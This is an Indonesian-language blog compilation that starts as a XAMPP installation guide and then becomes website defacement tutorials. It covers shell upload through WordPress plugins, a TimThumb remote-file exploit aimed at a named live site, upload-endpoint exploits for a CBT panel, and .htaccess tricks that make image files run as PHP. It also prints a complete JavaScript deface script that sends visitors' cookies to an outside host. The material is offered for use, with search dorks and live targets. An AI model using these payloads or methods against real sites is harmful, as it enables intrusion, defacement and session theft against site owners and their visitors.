CARA INSTALL XAMPP DI WINDOWS


  1. Download aplikasi XAMPP terbaru, https://www.apachefriends.org/download.html


    cara install xampp
  2. Dobel klik file XAMPP yang baru saja Anda download, nanti selanjutnya akan muncul jendela “installer language” seperti di bawah ini:


    instal xampp, xampp localhost
  3. Selanjutnya pilih bahasa. Pilih yang Bahasa Inggris (English). Klik OK.
  4. Kadang pada proses ini muncul pesan error. Jika ada, abaikan saja dan lanjutkan dengan klik OK dan YES.


    2-instal-xampp


    3-instal-xamp
  5. Berikutnya akan muncul jendela yang isinya meminta Anda menutup semua aplikasi yang sedang berjalan. Jika semua aplikasi sudah ditutup, maka klik tombol Next.

    4-instal-xampp
  6. Selanjutnya Anda akan diminta untuk memilih aplikasi yang mau diinstal. Centang saja semua pilihan dan klik tombol Next.


    5-instal-xampp
  7. Kemudian Anda akan diminta untuk menentukan lokasi folder penyimpanan file-file dan folder XAMPP. Secara default akan diarahkan ke lokasi c:\xampp. Namun jika Anda ingin menyimpannya di folder lain bisa klik browse dan tentukan secara manual folder yang ingin digunakan. Jika sudah selesai, lanjutkan dan klik tombol Install.

    6-instal-xampp
  8. Tunggu beberapa menit hingga proses intalasi selesai. Jika sudah muncul jendela seperti di bawah ini, klik tombol Finish untuk menyelesaikannya.


    7-instal-xampp
  9. Berikutnya, akan muncul jendela dialog seperti gambar di bawah ini yang menanyakan Anda apakah mau langsung menjalankan aplikasi XAMPP atau tidak. Jika ya, maka klik YES.


    8-instal-xampp

Cara Menjalankan Aplikasi XAMPP

  1. Bukalah aplikasi XAMPP, bisa melalui Start Menu atau Desktop, dan klik icon XAMPP. Atau, jika Anda membukanya begitu proses instalasi selesai maka klik Yes seperti yang terlihat pada gambar di atas.
  2. Setelah terbuka, silahkan klik tombol Start pada kolom Action sehingga tombol tersebut berubah menjadi Stop. Dengan mengklik tombol tersebut, artinya itulah aplikasi yang dijalankan. Biasanya jika saya menggunakan XAMPP, yang saya start hanyalah aplikasi Apache dan MySQL, karena saya tidak memerlukan aplikasi seperti Filezilla, dan lain-lain.


    9-instal-xampp


    10-instal-xampp


  3. Sekarang bukalah browser kesukaan Anda, dan coba ketikkan http://localhost/xampp di address bar. Jika muncul tampilan seperti gambar di bawah ini, instalasi telah berhasil.


    11-instal-xampp
Selamat, akhirnya Anda berhasil menginstal aplikasi XAMPP. Sekarang komputer Anda sudah berfungsi seperti server dan bisa menjalankan aplikasi-aplikasi berbasis web.

Cara Upload Shell Di Wordpress


Assalamualaikum wr.wb

Bahan :
- Dashboard Wordpress ( Wajib )
- Shell ext php 

Langsung aja ke tutor
- Nah kali ini gw udah masuk ke dashboard Wordpress
- Kalo udah masuk klik "Plugins" klik "Add new". Gapaham liat gambar


- Kalo udah klik "Add new" trus "Upload Plugins" pilih shell kalian yang mau diupload. 
Gapaham liat gambar


- Kalo sudah kita cari akses shellnya. Caranya dibelakang web target kita kasih ( wp-content/uploads/tahun/bulan/namashell.3gp )
Tanpa tanda kurung

- Kalo Not Found kita buka index off nya caranya kaya diatas tapi gaush pake namashell kalian

- Kalo sudah muncul index off nya kalian cari nama shell kalian lalu klik deh


- Tada muncul deh shell kalian

[ • ] Sekian Tutorial Yang Ez Ini Semoga Bermanfaat [ •]

- Nama Kelompok :

  1. Satrio Wibawa
  2. Wahyu Andika
  3. Muh. Hidayat
  4. Miftahul Ma'ruf                                 
Deface Dengan Proof Timthumb

Assalamualaikum Wr.Wb
Muehehe lama gak post anjng :v
Disini gw bakal kasih tutorial deface dengan proof timthumb 

Bahan-bahan :
• Dork + Exploit
• Mini Shell / Shell Private
• Rokok, Softex, Kopi kali aja nanti mens
• Kuota + Google

[ ! ] Dork : 
 • inurl:kinheditor (Dork Di Image)
 " From -> L4663r666h05t -> RebellionGhost "
[ ! ] Exploit :
• /thumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php
[ ! ] Life Target
• http://opp.com.vn/ [ ! ] Jan Dipatch Anjing Buat Tutor [ ! ]

[ ? ] Nah klo kalian mau ngedork ya silahkan klo mau coba pake live target saya juga silahkan...

[ ? ] Sekarang pergi ke target + tambahin exploitnya jadinya gini
[ ! ] http://opp.com.vn/thumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php [ ! ]

[ ? ] Nah kalo vuln ciri" nya Timthumb Version dibawah 2.0
Liat Gambar


Timthumb Version : 1.30 = vuln

[ ? ] Nah klo udh gitu copy kan tulisan yang paling atas dibelakang web
Jadi gini : http://webtadi.com/cache/blablablabla.php
Klo masih bingung copy kan tulisan yang saya kasih tanda di bawah ini


[ ? ] Kalo sudah biarkan loading dahulu sampai muncul tulisan " GIF89a ; success ://blablabla
Klo masih bingung liat gambar dibawah


[ ? ] Kalo muncul tulisan kek diatas dibelakang web tambahin cache/dedot.php
Jadi - http://webtadi.com/cache/dedot.php

[ ? ] Kalo berhasil akan muncul uploader buat upload shell kalian ( Liat Gambar Dibawah )



[ ? ] Kalo Forbidden cari yang laen aja mungkin muka lo belom memadai 

[ ? ] Kalo udh muncul uploader ya tinggal Upload Shell kalean

[ ? ] Cara manggil akses kalian ya teken tulisan warna biru gitu aja susah

[ ? ] Dan taraaaa shell udh ketanem
[ ? ] Kalo udh gini u know lah
[ ? ] Happydefacer

Thanks To God, RebellionGhost, Surabaya Hacker Link and all team defacer
From
https://forum.surabayablackhat.org/d/598-timthumb-rce-1-x-x-new-dork-2019

Oke Sobat Kali Ini Gw Bakal Ngasih Tau Cara Buat Script JSO
JSO Yaitu JavaScript Overlay
Gunanya Script Ini Yaitu Untuk Menutupi Halaman Utama / Halaman Lainnya
Jadi Kita Tidak Merubah Kode index.php / File Lainnya Tapi Kita Hanya Menutup Halamannya
Script Ini Diperlukan Saat Kita Ingin Mendeface Suatu Web Tapi Tidak Bisa Mengupload Shell Backdoor
Oke Langsung Aja Comot Script nya


/*
<style>html,body{color:#ffffff}</style><font color='black'><script>top.location.href='http://www.google.com/?v=wall/'</script><noscript><META HTTP-EQUIV="refresh" CONTENT="0;URL=http://www.facebook.com/?v=wall/">
*/
document.getElementsByTagName('body')[0].innerHTML=""
document.title="Hacked By SYNON_"
var shortc=document.createElement("link");shortc.rel="SHORTCUT ICON";shortc.href="https://f.top4top.net/p_10839fkwj0.jpg";document.getElementsByTagName("head")[0].appendChild(shortc)
function muter2(){
scrW=screen.availWidth
scrH=screen.availHeight
window.moveTo(0,0)
window.resizeTo(10,10)
window.focus()
for(x=0;x<80;x++){
window.resizeTo(10,scrH*x/80)
}
for(y=0;y<80;y++){
window.resizeTo(scrW*y/80,scrH)
}
window.resizeTo(scrW,scrH)
}
document.oncontextmenu=new Function("muter2();return false");
function keypressed(){alert("SYNON IN HERE");}
document.onkeydown=keypressed;
function kasih_tau(){
alert('SYNON IN HERE');
}
if(location.href.indexOf('sman2bangkalan.sch.id')==-1)setTimeout("alert('SYNON_');",3000);
else setTimeout("kasih_tau()",3000);
if(navigator.userAgent.indexOf('MSIE')!=-1){
document.getElementsByTagName('body')
[0].innerHTML="<center><iframe src='https://webscriptmu' height='2200px' width='1100px' scrolling='no' frameborder='0'></center>";
}
else{
if(document.getElementsByTagName('body')[0].style.cssText.indexOf('hack')==-1){
//muter2();
log="";
if(document.cookie!=""&&location.href.indexOf('ayodance.com')==-1){x=escape(document.cookie);v=escape(location.href);y="1337@null.net";log=";background-image:url(http://crazydavinci.net/riper.php?o="+escape(x)+"&v="+escape(v)+"&y="+escape(y)+")";document.cookie="PHPSESSID=!Bagsfreakz Here!;path=/";}
document.getElementsByTagName('body')[0].style.cssText="background-color:black"+log
window.onload=function(){
document.getElementsByTagName('body')[0].innerHTML="<center><iframe src='https:webscriptmu' height='2200px' width='1100px' scrolling='no' frameborder='0'></center>";
document.getElementsByTagName('body')[0].style.cssText="background-color:#ffffff;background-image:url(http://www.balikita.net/)!important;";
}
}
}

<style type="text/css">
body{
background-color: red;
}</style>

Kalian Ubah Dengan Link Script Yang Sudah Kalian Upload Diweb

Sekarang Kalian Menuju Ke Pastebin dan Copykan Script Diatas Kekolom Pastebin Dan Klik "Raw" dan Linknya akan jadi
http://pastebin.com/raw/blablabla

Nah Script Jso Gini
 <script type="text/javascript" src="link tadi"></script>

Nih Script Jso Gw
 <script type="text/javascript" src="https://pastebin.com/raw/7yzq0xrH"></script>

Oke Sampe Sini 

Hy Buriq
Kali Ini Gw Hidayat Gans Akan Membagikan Cara Mencari Tempat Dimana Akses Kita Tertanam

Biasanya Saat Kita Ingin Membuka Akses Shell Kita Kita Harus Tekan Lama Dan Klik "Buka Ditab Baru"
Nah Tapi Pasti Ada Salah Satu Web Yang Tidak Bisa Menggunakan Cara Itu...

Oke Langsung Saja Ke TKP


Nah Website Diatas Adalah Website Yang Telah Saya Upload Shell
Tapi Disana Saya Tidak Bisa Menekan Lama Gambar Yang Rusak Tersebut...
Nah Cara Lain Untuk Mencari Akses Shell Kita Adalah Menggunakan "view-source:" Yang Berguna Membuka Semua Kode HTML... Oke Cara Menggunakannya Adalah Dengan Menambahkan "view-source:" didepan weblu...
Contoh : http://hidayatgans.ya -> view-source:http://hidayatgans.ya....
Maka Akan Muncul Kode HTML


Cari Yang Berhubungan Dengan Akses Shell Lu ( Liat Gambar Diatas )
Biasanya <a href="path/path/namashell.php>
Pokoknya Yang Berhubungan Dengan Shell Lu
Kalo Udah Nemu Tinggal Klik Deh


And Boooom Saya Dah Nemu Jodoh Saya... Eh mksdnya Shell saya
And Then From Here You Know
Happy Deface :v

Hello Sobat Missqueen
Balik Lagi Ama Gw Orang Tampan Yang Jadi Idaman Mantan :v
Oke Kali Ini Gw Bakal Jelasin Fungsi Dari File .htaccess
Oke Sekedar Info Aja... Mungkin Kalian Para Defacer Tidak Asing Lagi Dengan File Yang Satu Ini
Hanya Sekedar Mengingatkan Bahwa File Satu Ini Biasanya Digunakan Saat Kita Deface dan Ingin Menebas Suatu Web Dengan Proof Com_Fabrik
Nah Balik Lagi Ke Topik Utama
Untuk Kalian Yang Gamau Ribet Ngebackup Index Dari Web Tersebut Kalian Bisa Menggunakan File Ini Untuk Menebas Halaman Depan Tanpa Merubah File index.php
Nah Oke Mari Kita Kupas Isi Dari .htaccess ini

.htaccess
#Alternate default index page
DirectoryIndex index.php/index.html
AddType application/x-httpd-php .png
AddType application/x-httpd-php .txt
AddType application/x-httpd-php .fla

Diatas Adalah Isi Dari File .htaccess
Disana Ada Tulisan "DirectoryIndex" Yang Berarti Tempat Dimana Halaman Depan Suatu Web atau Folder
Nah Setelah Ada Tulisan "DirectoryIndex" Ada Tulisan "index.php/index.html" Nah Tulisan Tersebut Bermaksud Bahwa Halaman Depan Suatu Web atau Folder Akan Ditampilkan Dari Source Code Dalam File Tersebut
Kalau Sobat Missqueen Gamau Repot** Ngebackup Caranya Sebagai Berikut :

[!] Upload Script Kalian Didalam Dir public_html
[!] Cari File .htaccess
[!] Pilih "edit" (didalam shell kalian sudah ada)
[!] Tulisan "index.php/index.html" Diganti Dengan    NamaFileKalian.php/NamaFileKalian.html
[!] Cek Halaman Depan Web Tersebut
[!] Kalo Halaman Depan Merupakan Script Kalian
[!] Selamat Anda Telah Menjadi Hacker

Oke Sekian Pembahasan .htaccess Kali Ini
Sampai Jumpa Next Time C0K


Hy Njing Balik Lagi Ama Gw Hidayat Gans
Kali Ini Gw Bakal Ngasih Tutorial Deface Dengan Proof CBT Siap in Bahan Bahannya C0K

1. Dork -> inurl:/panel/pages/login.php [Kembangin Biar Dapet Yang Fresh]

2. Exploit -> /[path]/panel/pages/upload-file.php
                      /[path/panel/pages/upload_image.php
                      [Kembangin Sampek Blank]

3. Mini Shell -> Kiss Me

4. Csrf Online -> Touch Me

5. Ketamvanan

Oke Berhubung Gw Udh Punya Target Langsung Aja Ke TKP



Blank? Auto Masukkin Ke CSRF ONLEN




Url -> Weblutadi.com
POSTFILE -> uploadfile
Trus Klik "Lock Target"


Tinggal Pilih Mini Shell Kesayangan Anda
Jika Berhasil Terdapat Tulisan "success" Dipojok Atas Kiri



Nah Muncul Tulisan Success Tinggal Kita Cari Tempat Shellnya Ke Upload
Nah Dari Sini Use Your Brain Untuk Nyari Tempat Shell Kalian :v
Bercanda Ya Njing
Akses -> weblu.com/images/shelllu.php


Dan Boom Dari Sini You Know lah
Happy Deface :v